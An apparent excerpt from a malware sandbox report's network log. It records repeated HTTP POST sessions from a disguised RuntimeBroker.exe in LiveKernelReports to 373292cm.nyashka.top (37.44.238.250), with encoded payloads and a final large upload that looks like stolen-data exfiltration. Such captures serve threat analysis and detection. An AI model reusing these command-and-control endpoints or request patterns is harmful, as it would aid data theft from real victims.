                                                                                  Data Ascii: _V\WTET^[_ZQYSX_W^]XW_SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/ /!-<^ 9X)7(([7X7?7#?();]#9\/&F$.Y/5
                                                                                  Jan 11, 2025 06:43:30.775299072 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:30.903352022 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.65698837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:31.195831060 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:31.565469027 CET2544OUTData Raw: 5f 54 5c 55 51 40 54 58 5b 5f 5a 51 59 5e 58 50 57 5a 5d 5f 57 50 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\UQ@TX[_ZQY^XPWZ]_WPSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.; ?!>(^#0!X*<_<-+.##Z?Q#8Q+8 V"..&F$.Y/
                                                                                  Jan 11, 2025 06:43:31.843065023 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:31.974092007 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.65699037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:32.230444908 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:32.582953930 CET2544OUTData Raw: 5f 52 59 50 54 45 54 51 5b 5f 5a 51 59 51 58 54 57 5e 5d 5e 57 5f 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _RYPTETQ[_ZQYQXTW^]^W_SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.],3,6 _4!>>0^>.-(=?Z"<7#;(< !]8&F$.Y/=
                                                                                  Jan 11, 2025 06:43:32.890387058 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:33.023919106 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.65699637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:33.191212893 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:33.535810947 CET2544OUTData Raw: 5a 51 5c 55 54 46 54 5c 5b 5f 5a 51 59 50 58 56 57 59 5d 59 57 51 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\UTFT\[_ZQYPXVWY]YWQS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;03@5=$^75[)<]+.:<=;X#<07W8Q<97_41Y;&F$.Y/
                                                                                  Jan 11, 2025 06:43:33.820041895 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:33.985991955 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.65700237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:34.058068991 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.65700737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:34.214401007 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:34.570993900 CET2536OUTData Raw: 5f 57 5c 52 51 40 54 59 5b 5f 5a 51 59 57 58 54 57 5f 5d 5b 57 59 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\RQ@TY[_ZQYWXTW_][WYS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-.3C5$#>>./<-<.<#<0#2'()^43"/&F$.Y/)
                                                                                  Jan 11, 2025 06:43:34.861743927 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:34.998178959 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.65701337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:35.135605097 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:35.488943100 CET2544OUTData Raw: 5a 50 5c 54 54 45 51 5b 5b 5f 5a 51 59 56 58 52 57 5d 5d 53 57 5e 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZP\TTEQ[[_ZQYVXRW]]SW^SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;(6 \40*>.,X<X9Z(# #<:7_4*;.&F$.Y/!
                                                                                  Jan 11, 2025 06:43:35.764413118 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:35.894414902 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.65701937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:36.271702051 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:36.629897118 CET2544OUTData Raw: 5a 56 59 57 54 46 54 5d 5b 5f 5a 51 59 54 58 56 57 5e 5d 5f 57 5c 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZVYWTFT][_ZQYTXVW^]_W\S^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.,/".#4))<>+.7]#,V42<?*$##*,&F$.Y/)
                                                                                  Jan 11, 2025 06:43:36.917495012 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:37.050012112 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.65702637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:37.414597988 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:37.770519018 CET2544OUTData Raw: 5f 57 5c 56 54 41 54 5e 5b 5f 5a 51 59 5e 58 55 57 50 5d 58 57 5a 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\VTAT^[_ZQY^XUWP]XWZS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y;?6-7 5\> >-)<.?7723?*$7 2/>&F$.Y/
                                                                                  Jan 11, 2025 06:43:38.040425062 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:38.170429945 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.65703637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:38.348045111 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:38.692085028 CET2544OUTData Raw: 5a 55 59 53 54 47 51 5e 5b 5f 5a 51 59 5e 58 56 57 5d 5d 5c 57 50 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYSTGQ^[_ZQY^XVW]]\WPS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/U3@"-7 5Y)#<>5_(=(#/+#20Q('\4V%]..&F$.Y/
                                                                                  Jan 11, 2025 06:43:38.976774931 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:39.106523037 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.65704237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:39.230544090 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.65704337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:39.268450975 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:39.613997936 CET2544OUTData Raw: 5a 50 5c 53 54 47 51 59 5b 5f 5a 51 59 5f 58 55 57 5e 5d 5b 57 5e 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZP\STGQY[_ZQY_XUW^][W^S^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.^; 'C"$_#V))> Y(=!+-X#,Q42,<:$4/>&F$.Y/
                                                                                  Jan 11, 2025 06:43:39.896876097 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:40.029237032 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.65705037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:40.562985897 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:40.911035061 CET2544OUTData Raw: 5f 57 5c 57 54 46 51 5d 5b 5f 5a 51 59 54 58 52 57 5d 5d 5f 57 59 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\WTFQ][_ZQYTXRW]]_WYSU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/ "# %)?<!Z<>7Z4Z341+9( 5,&F$.Y/)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.65705537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:41.162261009 CET283OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 171160
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:41.520301104 CET12360OUTData Raw: 5f 54 5c 50 54 45 54 51 5b 5f 5a 51 59 54 58 51 57 5f 5d 5d 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\PTETQ[_ZQYTXQW_]]W_S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./#'D5#7!Y)-_?X)?=X7< !!W?0#V68>&F$.Y/)
                                                                                  Jan 11, 2025 06:43:41.525284052 CET2472OUTData Raw: 2b 5a 3f 5a 23 5f 5f 00 31 00 25 16 02 16 26 3c 01 30 29 0a 37 25 30 16 0a 3d 19 2b 3f 5a 2e 2d 32 3c 34 28 22 5e 1e 2e 0d 5a 3d 30 08 08 25 11 3b 38 05 2a 0d 20 36 32 3d 26 18 0b 3f 28 17 21 3d 5b 1c 20 0d 29 05 10 3f 03 2e 06 3d 12 5d 5f 24 2b
                                                                                  Data Ascii: +Z?Z#__1%&<0)7%0=+?Z.-2<4("^.Z=0%;8* 62=&?(!=[ )?.=]_$+<R?V]?+953=9<,4*^ ??T/!<E6.\?3>-7."-U1<:% ^478@]/:6(8??*5* =1S'\<&31PT1V2+32"-*$'2?2*':6/?8+ZVW>,+V>.<9%=1/
                                                                                  Jan 11, 2025 06:43:41.525309086 CET7416OUTData Raw: 33 0d 1c 19 24 20 24 06 24 5d 02 1d 37 22 05 18 36 31 5e 54 29 36 21 5a 3f 28 5c 08 21 55 21 2e 37 02 27 12 06 04 32 18 38 34 22 1b 3a 58 19 10 26 3b 2e 32 02 2d 29 2e 25 11 30 5d 34 0c 5b 2f 0b 07 5e 07 3d 04 25 3e 0e 3e 15 04 2f 5c 1e 06 0b 12
                                                                                  Data Ascii: 3$ $$]7"61^T)6!Z?(\!U!.7'284":X&;.2-).%0]4[/^=%>>/\99+;)$[+8W0+54)\2!T<^$1%7(/-1#5S:>95!!W%\>#>!?8*2T5C[3?.<)<5Z#&9-'1Y?-<"Y=#:+=!);#95?+ !*\>\,:64> +,V9 X61)"1
                                                                                  Jan 11, 2025 06:43:41.525341988 CET3708OUTData Raw: 2b 02 23 1b 03 02 1a 3b 3f 1c 0f 5c 0e 57 0e 35 27 34 0e 5e 38 56 19 12 36 08 2d 13 34 42 2e 1f 3c 2b 2f 32 33 0a 5e 21 29 59 5b 3e 05 2f 31 17 3f 2a 0f 1f 3c 10 3c 16 33 39 22 39 37 3c 07 2a 3d 00 20 5c 34 22 1a 1f 30 03 53 14 3b 5c 1b 3d 3a 59
                                                                                  Data Ascii: +#;?\W5'4^8V6-4B.<+/23^!)Y[>/1?*<<39"97<*= \4"0S;\=:Y\1 5-]*UY#&+8)/8><.)V:+ !5^X:!#81%$82=63.%>,A0+-.4/Y9(H[]<2,>'_.* =#W#Z5'8#;=-],38:8$^#/Y=]3=4$02/
                                                                                  Jan 11, 2025 06:43:41.525353909 CET1236OUTData Raw: 03 3d 26 09 03 06 20 3c 23 2b 38 1d 0a 3f 2d 26 09 20 04 1f 30 5f 23 5d 32 08 14 57 09 31 36 34 25 27 0b 07 3a 59 14 36 3f 41 1a 26 37 02 3e 37 2c 5b 01 5f 3c 39 37 18 29 2c 0f 50 28 5a 01 15 3f 07 2d 1d 3a 5b 2a 38 0f 00 2c 3d 15 2c 0b 3c 3d 33
                                                                                  Data Ascii: =& <#+8?-& 0_#]2W164%':Y6?A&7>7,[_<97),P(Z?-:[*8,=,<=321$,10$:<D&9*,?;">,4[W= !='308K8;3E&0+8#"X 5T<<>+;0,6T ^66-^&S<!>,$.2!&9"\<X>)32!>/,9U8.3!!9R9,+)\>0;.</#8<$*6].:"
                                                                                  Jan 11, 2025 06:43:41.525409937 CET4944OUTData Raw: 3e 06 33 59 30 34 16 20 3e 58 56 08 32 26 22 35 3c 3e 5c 23 27 5f 1a 5c 33 2b 5e 50 2a 5c 04 5e 03 37 5a 36 37 01 0a 05 26 05 3f 2a 02 3e 1b 1f 06 3f 34 20 3a 3b 24 3b 3c 05 3d 0f 39 0b 03 33 33 3a 27 5a 0a 2e 25 17 38 2d 2a 21 3a 39 03 2c 0b 11
                                                                                  Data Ascii: >3Y04 >XV2&"5<>\#'_\3+^P*\^7Z67&?*>?4 :;$;<=933:'Z.%8-*!:9,=W48)Y,(<-?,?)><9X$3&Y9#>^5$S"=:<1*\8%*0,< 0,9='<9$?7E5;:82<_)[4+05]24_8\,',>T*RP%3%>=4?9^8?,?^4<71
                                                                                  Jan 11, 2025 06:43:41.525469065 CET2472OUTData Raw: 0c 2d 26 09 3b 1a 3c 26 3f 31 26 23 34 59 01 13 21 5d 48 06 04 3f 3e 51 27 2f 16 1f 38 35 39 10 08 04 10 19 38 2f 23 55 25 5b 21 13 3d 30 34 15 3b 57 21 35 30 33 27 43 23 31 33 1f 0f 55 32 1d 00 3f 15 3f 3c 22 3e 25 2b 2e 1a 38 0c 5b 27 14 23 56
                                                                                  Data Ascii: -&;<&?1&#4Y!]H?>Q'/8598/#U%[!=04;W!503'C#13U2??<">%+.8['#V3;39 1*682_8_<[7)!]=> <6$8652=6!=;U>#?=X<<'?P'869=38]-33^',;Z]2\93+R <%]46<;X#+,,?>U-^*-1740R<==-W4-<7?^_!#'U><;+
                                                                                  Jan 11, 2025 06:43:41.525501966 CET2472OUTData Raw: 0a 32 29 2b 34 2a 25 22 3a 12 2b 02 31 01 53 35 3c 2e 39 5b 3c 39 29 19 10 5a 23 04 27 5c 2c 3c 28 00 0f 0d 2e 38 26 05 3a 09 2e 16 3e 5f 53 52 3a 30 05 1f 05 5b 51 25 04 3f 0a 19 21 07 02 30 27 2e 13 2d 25 1f 1f 13 0d 03 19 1c 3f 2e 31 50 27 0c
